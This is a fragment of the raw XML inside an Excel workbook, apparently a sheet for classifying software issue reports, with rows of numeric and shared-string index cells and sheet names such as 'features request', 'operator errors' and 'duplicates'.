    <row r="43" spans="1:16" x14ac:dyDescent="0.3">
      <c r="A43">
        <v>77091</v>
      </c>
      <c r="B43" t="s">
        <v>27255</v>
      </c>
      <c r="C43" t="s">
        <v>21</v>
      </c>
      <c r="D43" t="s">
        <v>51</v>
      </c>
      <c r="E43" t="s">
        <v>3110</v>
      </c>
      <c r="F43" t="s">
        <v>19481</v>
      </c>
      <c r="G43" t="s">
        <v>11536</v>
      </c>
      <c r="H43" t="s">
        <v>27256</v>
      </c>
      <c r="I43" t="s">
        <v>17</v>
      </c>
      <c r="J43" t="s">
        <v>27257</v>
      </c>
      <c r="K43" t="s">
        <v>27258</v>
      </c>
      <c r="L43" t="s">
        <v>27259</v>
      </c>
      <c r="M43" t="s">
        <v>16927</v>
      </c>
      <c r="N43" t="s">
        <v>20</v>
      </c>
      <c r="O43">
        <v>37</v>
      </c>
      <c r="P43" t="s">
        <v>27260</v>
      </c>
    </row>
    <row r="44" spans="1:16" x14ac:dyDescent="0.3">
      <c r="A44">
        <v>98771</v>
      </c>
      <c r="B44" t="s">
        <v>27654</v>
      </c>
      <c r="C44" t="s">
        <v>21</v>
      </c>
      <c r="D44" t="s">
        <v>43</v>
      </c>
      <c r="E44" t="s">
        <v>6179</v>
      </c>
      <c r="F44" t="s">
        <v>19481</v>
      </c>
      <c r="G44" t="s">
        <v>11536</v>
      </c>
      <c r="H44" t="s">
        <v>27655</v>
      </c>
      <c r="I44" t="s">
        <v>17</v>
      </c>
      <c r="J44" t="s">
        <v>27656</v>
      </c>
      <c r="K44" t="s">
        <v>27657</v>
      </c>
      <c r="L44" t="s">
        <v>27658</v>
      </c>
      <c r="M44" t="s">
        <v>8165</v>
      </c>
      <c r="N44" t="s">
        <v>20</v>
      </c>
      <c r="O44">
        <v>5</v>
      </c>
      <c r="P44" t="s">
        <v>27659</v>
      </c>
    </row>
    <row r="45" spans="1:16" x14ac:dyDescent="0.3">
      <c r="A45">
        <v>112761</v>
      </c>
      <c r="B45" t="s">
        <v>27897</v>
      </c>
      <c r="C45" t="s">
        <v>21</v>
      </c>
      <c r="D45" t="s">
        <v>1460</v>
      </c>
      <c r="E45" t="s">
        <v>6599</v>
      </c>
      <c r="F45" t="s">
        <v>26984</v>
      </c>
      <c r="G45" t="s">
        <v>11536</v>
      </c>
      <c r="H45" t="s">
        <v>27898</v>
      </c>
      <c r="I45" t="s">
        <v>17</v>
      </c>
      <c r="J45" t="s">
        <v>27899</v>
      </c>
      <c r="K45" t="s">
        <v>27900</v>
      </c>
      <c r="L45" t="s">
        <v>27901</v>
      </c>
      <c r="M45" t="s">
        <v>2379</v>
      </c>
      <c r="N45" t="s">
        <v>20</v>
      </c>
      <c r="O45">
        <v>8</v>
      </c>
      <c r="P45" t="s">
        <v>27902</v>
      </c>
    </row>
    <row r="46" spans="1:16" x14ac:dyDescent="0.3">
      <c r="A46">
        <v>119731</v>
      </c>
      <c r="B46" t="s">
        <v>28029</v>
      </c>
      <c r="C46" t="s">
        <v>21</v>
      </c>
      <c r="D46" t="s">
        <v>51</v>
      </c>
      <c r="E46" t="s">
        <v>9219</v>
      </c>
      <c r="F46" t="s">
        <v>37</v>
      </c>
      <c r="G46" t="s">
        <v>11536</v>
      </c>
      <c r="H46" t="s">
        <v>28030</v>
      </c>
      <c r="I46" t="s">
        <v>17</v>
      </c>
      <c r="J46" t="s">
        <v>28031</v>
      </c>
      <c r="K46" t="s">
        <v>24573</v>
      </c>
      <c r="L46" t="s">
        <v>28032</v>
      </c>
      <c r="M46" t="s">
        <v>25878</v>
      </c>
      <c r="N46" t="s">
        <v>20</v>
      </c>
      <c r="O46">
        <v>5</v>
      </c>
      <c r="P46" t="s">
        <v>28033</v>
      </c>
    </row>
    <row r="47" spans="1:16" x14ac:dyDescent="0.3">
      <c r="A47">
        <v>153511</v>
      </c>
      <c r="B47" t="s">
        <v>28110</v>
      </c>
      <c r="C47" t="s">
        <v>21</v>
      </c>
      <c r="D47" t="s">
        <v>51</v>
      </c>
      <c r="E47" t="s">
        <v>9219</v>
      </c>
      <c r="F47" t="s">
        <v>37</v>
      </c>
      <c r="G47" t="s">
        <v>11536</v>
      </c>
      <c r="H47">
        <v>4.7</v>
      </c>
      <c r="I47" t="s">
        <v>17</v>
      </c>
      <c r="J47" t="s">
        <v>28111</v>
      </c>
      <c r="K47" t="s">
        <v>28112</v>
      </c>
      <c r="L47" t="s">
        <v>28113</v>
      </c>
      <c r="M47" t="s">
        <v>25878</v>
      </c>
      <c r="N47" t="s">
        <v>20</v>
      </c>
      <c r="O47">
        <v>35</v>
      </c>
      <c r="P47" t="s">
        <v>28114</v>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:P47" xr:uid="{F0EC51D3-4D65-4ABD-B819-8A7920865205}"/>
  <phoneticPr fontId="1" type="noConversion"/>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9"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7</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>命名范围</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="8" baseType="lpstr">
      <vt:lpstr>classified</vt:lpstr>
      <vt:lpstr>features request</vt:lpstr>
      <vt:lpstr>compile-time issures</vt:lpstr>
      <vt:lpstr>documentation issues</vt:lpstr>
      <vt:lpstr>operator errors</vt:lpstr>
      <vt:lpstr>other issues</vt:lpstr>
      <vt:lpstr>duplicates</vt:lpstr>
      <vt:lpstr>classified!Criteria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2018-01-08T15:28:15Z</dcterms:modified>
</cp:coreProperties>
</file>